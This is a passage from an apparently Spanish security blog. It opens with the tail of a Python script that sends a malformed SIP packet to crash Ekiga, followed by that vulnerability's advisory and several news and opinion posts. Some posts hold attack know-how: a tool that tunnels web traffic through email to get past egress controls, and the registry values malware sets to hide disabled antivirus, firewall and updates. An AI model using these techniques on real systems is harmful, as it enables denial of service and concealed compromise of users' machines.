"Max-Forwards:70\r\n"+\
"To:sip:paco@micasa.com\r\n"+\
"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()

Esta vez tenemos que dar gracias a Malybuzz :)

S21SEC-036-EN Ekiga Remote Denial of Service

Title: Ekiga Denial of Service
ID: S21SEC-036-en
Severity: Medium - Remote DoS
History: 14.May.2007 Vulnerability discovered
09.Jul.2007 Vendor contacted

Scope: Application Denial of Service
Platforms: Any
Author: Jose Miguel Esparza
URL: http://www.s21sec.com/avisos/s21sec-036-en.txt
Release: Public

[ SUMMARY ]

Ekiga (formely known as GnomeMeeting) is an open source VoIP and video conferencing application for GNOME. Ekiga uses both the H.323 and SIP protocols. It supports many audio and video codecs, and is interoperable with other SIP compliant software and also with Microsoft NetMeeting.


[ AFFECTED VERSIONS ]

Following versions are affected with this issue:
- Ekiga 2.0.7 and prior.


[ DESCRIPTION ]

Due to a bad management of memory allocation for the input data it's possible to crash the application causing a denial of service.

[ WORKAROUND ]

Upgrade to 2.0.9 version is recommended to resolve this problem. If not possible, some additional input data check will be necessary in the SIPURL::GetHostAddress() function


[ ACKNOWLEDGMENTS ]

This vulnerability have been found and researched by:
- Jose Miguel Esparza S21Sec


[ ADDITIONAL INFORMATION ]

This vulnerability has been discovered thanks to the network fuzzer Malybuzz available in the url http://www.s21sec.com/malybuzz/malybuzz.html


[ REFERENCES ]

* Ekiga
http://ekiga.org
* S21Sec
http://www.s21sec.com
* Malybuzz
http://malybuzz.eternal-todo.com

CEE: Common Event Expression

Desde ya hace varios meses, existe una iniciativa desde MITRE para intentar crear un estándar sobre el formato de los eventos generados por los diferentes dispositivos y aplicaciones. S21sec lleva ya años en el mercado de la gestión de eventos gracias a su producto Bitácora y en todo este tiempo nos hemos encontrado con todo tipo de formato de eventos (logs). En sí, este hecho no es problema puesto que en Bitácora es relativamente sencillo añadir cualquier formato de eventos en un tiempo mínimo, puesto que su flexibilidad nos permite crear un documento XML donde se especifica el nuevo formato y de esta forma solucionamos el problema rápidamente.

Pero también es verdad que para poder utilizar la información presente en los eventos de una forma más eficiente (y más inteligente), es necesario que todas las aplicaciones y dispositivos hablen el mismo lenguaje, porque ahora mismo la situación actual podría ser comparada a la Torre de Babel.

Esta iniciativa de MITRE, respaldada por todos los grandes fabricantes de productos de gestión de eventos (incluido S21sec) pretende crear un lenguaje único para intentar evitar todos los problemas con los que nos enfrentamos actualmente.

Así que, si os interesa esta iniciativa, todavía podéis participar en la lista de correo de MITRE habilitada a tal efecto. ¡Nos vemos en la lista de correo!

Más información en el folleto que saldrá próximamente por parte de MITRE.

Arranca el curso de Análisis de Seguridad Online!

El día 1 de Octubre, dará comienzo el curso online de Análisis de seguridad de la información para el próximo 1 de octubre. Este curso, que concluirá el 21 de diciembre, forma parte del Máster Online en Gestión de la Seguridad de la Información que S21sec organiza junto al instituto tecnológico Foro Europeo. La flexibilidad de este Máster permite a los alumnos cursar los módulos que deseen por separado, para adecuarse más a sus necesidades.

El curso está dirigido a profesionales responsables en la elaboración o participación del Plan de Seguridad de una compañía, como son los directores de área o los responsables de Sistemas y Redes y de seguridad de las TIC. También está orientado hacia los técnicos informáticos encargados en la aplicación de la tecnología de la seguridad para la protección de los activos y procesos de la organización.

El contenido de este módulo se divide en cinco apartados; el primero tratará sobre el mundo del hacking, sus métodos, técnicas y herramientas. El segundo sobre los métodos preventivos y de defensa ante incidentes. El tercero se centrará en la auditoría de la seguridad, mientras el cuarto será un análisis del mundo del malware y aplicaciones maliciosas (Phishing, Virus, Troyanos, etcétera). Por último, en el quinto se ofrecerán unas bases para la búsqueda de signos de intrusión en sistemas y la forma de actuar en estas situaciones.

Esperamos que os parezca interesante.

Achtung: Hackers sind Verboten!

Alemania se está tomando muy en serio el peligro de la seguridad informática y los ataques a empresas e instituciones oficiales. En concreto, según el semanario "Der Spiegel" ha habido ataques chinos en los últimos meses que han afectado a numerosos ordenadores del gobierno alemán, en la forma de troyanos que supuestamente habrían enviado cientos de Gigabytes hacia el extremo oriente. Desde que se descubrieron internamente en Mayo, los expertos IT del gobierno alemán supervisaron el tráfico generado por los troyanos e impidieron el envío de 160 Gigabytes hacia su destino final.

Este hallazgo ha creado malestar en el gobierno alemán quien ya ha pedido explicaciones y medidas de control a su homólogo chino.

Ya en el mes de febrero 2007 este mismo semanario publicaba una noticia advirtiendo del gran incremento de ataques chinos a medianas empresas alemanas, especialmente de medicamentos, piezas de automóvil,... Según este mismo articulo, las empresas medianas son especialmente vulnerables por no disponer de las medidas de seguridad adecuadas. Se cita como factores de riesgo adicional la telefonía por Internet e incluso la información al alcance de becarios. El conocimiento de estos ataques ha incrementado la preocupación ya existente de plagio de diseños alemanes por competidores chinos, que incluso ha dedicado un polémico reportaje especial sobre el tema con el título “Los espías amarillos”. Para muestra las siguientes fotos en las que se puede apreciar el supuesto plagio de un autobús MAN Starliner completo:

El gobierno alemán hace tiempo que es consciente de esta amenaza y así en Mayo 2007, como un intento de pararla, se aprobó la ya famosa ley 202c StGB, que indica que fabricar, programar, instalar o distribuir software que ’sortee’ la seguridad está prohibido


Esta ley sin embargo no ha sentado bien en las asociaciones encargadas de vigilar por la seguridad digital, ya que en su opinión “prohibir este software es tan útil como lo sería prohibir la venta de martillos por el hecho de que algunas veces haya accidentes con ellos”, según palabras textuales del Chaos Computer Club. De hecho en su website figura irónicamente como entrada un campo con florecitas que es en lo que el gobierno alemán ha conseguido transformar Internet con esta ley, y “como ya no hay problemas de seguridad, tampoco hace falta herramientas para mejorarla.”

Las primeras reacciones ya se han dejado notar, y proyectos como el Kismac, un excelente sniffer wireless para usuarios de MAC, trasladaron sus servidores a Suiza, donde la ley 202c StGB no tiene cobertura legal. Sin embargo, unas semanas más tarde el principal desarrollador de Kismac ha decidido dejar el proyecto para evitar problemas asociadas con dicha ley.

El grupo de expertos en seguridad digital THC (The Hacker’s Choice) también ha sido afectado por esta ley y ha decidido separar su site en dos, una para usuarios alemanes y otra para no alemanes. Esto se debe a que los usuarios alemanes podrían incurrir en un delito si suministran información sobre vulnerabilidades de seguridad. Como muestra este hilo de discusión sobre una vulnerabilidad, en que el experto en seguridad afincado en Alemania declina dar más información por temas legales.

Sin embargo, pese a todas estas medidas para ilegalizar herramientas y defenderse de ataques de troyanos extranjeros, el Ministerio alemán del Interior ha aprobado la creación de un troyano para vigilar ordenadores sospechosos.

Sin duda, esta medida va a traer cola, así que estaremos al corriente de lo que pase.

La dinámica de sistemas en los modelos de la seguridad de la información

La dinámica de sistemas es una disciplina que tiene su origen en el MIT hacia finales de los años 50. Su fundador, Jay W. Forrester, trató de aglutinar en ella todo el conocimiento adquirido acerca de la teoría de sistemas mientras trabajaba como ingeniero eléctrico. La principal novedad de esta teoría es la posibilidad de hacer un modelado de sistemas complejos basado en bucles de realimentación, retardos entre variables y dependencias no lineales entre ellas. Resulta particularmente apropiada para obtener una visión de la estructura que define el comportamiento de un sistema y así saber cómo alterar ésta para obtener los cambios deseados en este comportamiento.

Hay dos razones principales por las cuales la dinámica de sistemas resulta especialmente apropiada para el análisis de la gestión de la seguridad. Por un lado, la gestión de la seguridad debe tratar con variables que evolucionan rápidamente con el tiempo en combinación con otras que lo hacen lentamente. Por otro, también se trata con variables que no tienen unas unidades de medida definidas, como por ejemplo el nivel de concienciación de la dirección de una empresa sobre una cuestión concreta.

S21sec y la escuela de ingenieros de la Universidad de Navarra (TECNUN) han colaborado estrechamente para desarrollar modelos de simulación en el ámbito de la seguridad digital. Fruto de esta colaboración han surgido varios papers que pueden ser consultados en la sección de proyectos de este blog (pincha aquí).

El último paper será presentado en CRITICS’07, el segundo congreso internacional en la seguridad de infraestructuras críticas en el ámbito de la tecnología de la información, que se celebra en Benalmadena-Costa (Málaga) durante los días 3,4 y 5 de octubre. Podemos adelantar que en este paper se presenta una metodología para el desarrollo de modelos de simulación de los sistemas de seguridad de la información basándose en dinámica de sistemas.

Para obtener más información basta visitar la página del congreso: http://critis07.lcc.uma.es/index.html.

¡Esperamos veros por allí!

HosProxy: Túneles y encapsulamientos

Todos sabemos el esfuerzo que realizan las empresas para proteger sus redes de los ataques exteriores; una de las medidas comunes y básicas es la instalación de un cortafuegos, el cuál sólo permitirá el acceso a los servicios seleccionados por la empresa.

Pero lo que muchas veces no vemos es el esfuerzo de las empresas para no permitir el tráfico saliente de sus redes. Hace poco nos encontramos en una red que no tenía conexión a Internet salvo por el correo electrónico. Era el único servicio permitido para los usuarios de la red. A raíz de esto surgió un desafío, navegar por Internet utilizando un navegador a través del sistema de correo.

A partir de esta necesidad se creó HosProxy, una herramienta desarrollada por Carlos del Ojo, del Departamento de Auditoría, que permite navegar por Internet utilizando de transporte el sistema de correo SMTP/POP3/IMAP.

La herramienta consta de un proxy que se instala en el ordenador del usuario dentro de la empresa, se configura para que envíe correos por la cuenta de SMTP de la empresa y que reciba por la cuenta POP3/IMAP de la empresa. La otra parte de la herramienta es hosTunnel, un servicio que corre en una máquina externa (Internet), la cual escucha por el puerto 25 (SMTP), y recibe los correos con las peticiones HTTP encapsuladas; entonces realiza las peticiones HTTP a las páginas solicitadas y crea un correo de respuesta con la página web encapsulada, el cual se envía a la cuenta POP3/IMAP del usuario.



El proxy estará continuamente consultando la cuenta POP3/IMAP para obtener los correos con las respuestas, las cuales desencapsulará y finalmente presentará la página web en el navegador. Obviamente este proceso tiene una penalización de rendimiento, pero esto no es lo que perseguíamos, sino poder navegar por internet a través del sistema de correo.

Una vez más demostramos que siempre hay maneras de saltarse los sistemas de seguridad y/o protecciones, lo que hace falta es motivación, tiempo y dedicación.

Descarga: HosProxy

Código malicioso: como sobrevivir de forma silenciosa (I)

Durante los próximos días, vamos a comentar diferentes técnicas que utilizan los códigos maliciosos para permanecer de forma oculta en un sistema. Existen diferentes formas para ser lo más silencioso posible, y es éste uno de los principales objetivos de cualquier malware existente en Internet (su supervivencia va en ello); es lo que comúnmente se denomina stealth malware.

Pensemos un momento en las tres principales medidas que es probable encontrar en una máquina con Microsoft Windows:

• Utilización de Windows Update para la actualización del sistema operativo
• Utilización del cortafuegos que viene por defecto
• Utilización de un antivirus

Estas tres medidas se utilizan para intentar protegernos de posibles amenazas. ¿Cuál es entonces una posible acción de un código malicioso? Deshabilitar las tres:

• Deshabilitar Windows Update es poco común, puesto que muchas veces es más interesante proteger la máquina que ya se posee y que no pueda ser adquirida por ningún competidor, pero aún así, muchas veces se puede observar esta acción.
• Deshabilitar un cortafuegos puede ser más eficiente si dejamos alguna puerta trasera (algún puerto escuchando para acceso remoto), en vez de dar de alta este proceso en el cortafuegos de Windows (fácil de detectar).
• Deshabilitar un antivirus es bastante común (o deshabilitar su actualización), puesto que un código malicioso que no sea detectado en ese momento, no impide que no sea detectado en la siguiente actualización del antivirus.

¿Cómo se puede deshabilitar estas opciones? Pues como casi todo en Windows, modificando el registro de Windows, pero siempre Windows te avisará de que se han desactivado, como se aprecia en la imagen anterior. Entonces, ¿cómo podemos deshabilitar estas notificaciones? En concreto existen tres entradas que se encargan de notificar cuando se desactiva cualquiera de estas opciones. La ruta exacta es 'HKLM\Software\Microsoft\Security Center', y allí existen tres claves: UpdatesDisableNotify, AntivirusDisableNotify, FirewallDisableNotify, que como su nombre indica, realizan las operaciones que hemos comentado.

Así, poniendo estos valores a '1', se evita que nos demos cuenta de estas modificaciones en nuestro sistema.

Otra de cajeros

En la sociedad occidental que nos ha tocado vivir los cajeros automáticos (en inglés ATM) son críticos para la vida diaria.

Curiosamente estos días ha saltado la noticia de cómo la tecnología utilizada por los delincuentes por una vez se ha vuelto en su contra.

La historia es la siguiente: al parecer, en un cajero se había instalado una microcámara con el fin de robar los números secretos de las tarjetas (PINs), alertados por un cliente la policía procedió a investigar el cajero encontrando las siguientes imágenes:



Durante el pasado año ciertos cajeros en EEUU fueron noticia por el uso de contraseñas maestras para modificar los importes y no hace tantos años que algunos estuvieron afectados por el gusano Nachi al usar Windows XP con la famosa vulnerabilidad de RCP DCOM.

Una vez analizados los datos nos vienen a la mente varias preguntas ¿Son los cajeros más seguros ahora que hace unos años? y todavía más importante ¿Cuánto tardaremos en ver surgir un troyano optimizado para CEN/XFS?